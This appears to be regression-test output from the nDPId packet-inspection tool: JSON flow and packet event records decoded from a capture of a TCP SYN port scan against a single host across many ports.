-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsZGUAADgGrA2sEAAIQA2GNIzTCU\/dU4MZAAAAAGACBAArPQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsU4AAACcGzfKsEAAIQA2GNIzTE7vdU4MZAAAAAGACEAAU0QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsFDQAADcG\/T6sEAAIQA2GNIzTFR3dU4MZAAAAAGACEAATbwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAssJ8AAC4GadOsEAAIQA2GNIzTBI3dU4MZAAAAAGACDAAn\/wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAskycAADgGfUusEAAIQA2GNIzTH5LdU4MZAAAAAGACBAAU+gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsqRsAADMGbFesEAAIQA2GNIzTBBLdU4MZAAAAAGACEAAkegAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsY3EAADQGsQGsEAAIQA2GNIzTBBHdU4MZAAAAAGACBAAwewAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAstmwAADkGWQasEAAIQA2GNIzTJxPdU4MZAAAAAGACCAAJeQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAs4BMAACgGQF+sEAAIQA2GNIzTCp3dU4MZAAAAAGACBAAp7wAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsVvUAADIGv32sEAAIQA2GNIzTAmndU4MZAAAAAGACDAAqIwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsyjsAADEGTTesEAAIQA2GNIzTBHXdU4MZAAAAAGACCAAsFwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsKc0AACYG+KWsEAAIQA2GNIzTBDfdU4MZAAAAAGACDAAoVQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsHIEAADgG8\/GsEAAIQA2GNIzTgA7dU4MZAAAAAGACBAC0fQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsJwwAACUG\/GasEAAIQA2GNIzTFyLdU4MZAAAAAGACCAAZagAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAswSYAADIGVUysEAAIQA2GNIzTBD3dU4MZAAAAAGACDAAoTwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsuoMAADkGVO+sEAAIQA2GNIzTwAvdU4MZAAAAAGACCABwgAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":831,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsqtgAACcGdpqsEAAIQA2GNIzTL+ndU4MZAAAAAGACEAD4ogAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsnj0AACkGgTWsEAAIQA2GNIzTEB3dU4MZAAAAAGACCAAgbwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsjVUAACoGkR2sEAAIQA2GNIzTB8\/dU4MZAAAAAGACDAAkvQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsshUAADkGXV2sEAAIQA2GNIzTAG3dU4MZAAAAAGACCAAwHwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAs6SIAADMGLFCsEAAIQA2GNIzSFKDdUoMYAAAAAGACEAAT7wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAscgsAACUGsWesEAAIQA2GNIzSBCrdUoMYAAAAAGACCAAsZQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsat0AADsGopWsEAAIQA2GNIzSAeHdUoMYAAAAAGACEAAmrgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsU+kAACgGzImsEAAIQA2GNIzSFw3dUoMYAAAAAGACBAAdggAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsfg8AADcGk2OsEAAIQA2GNIzSH2rdUoMYAAAAAGACEAAJJQAAAgQFtA=="} 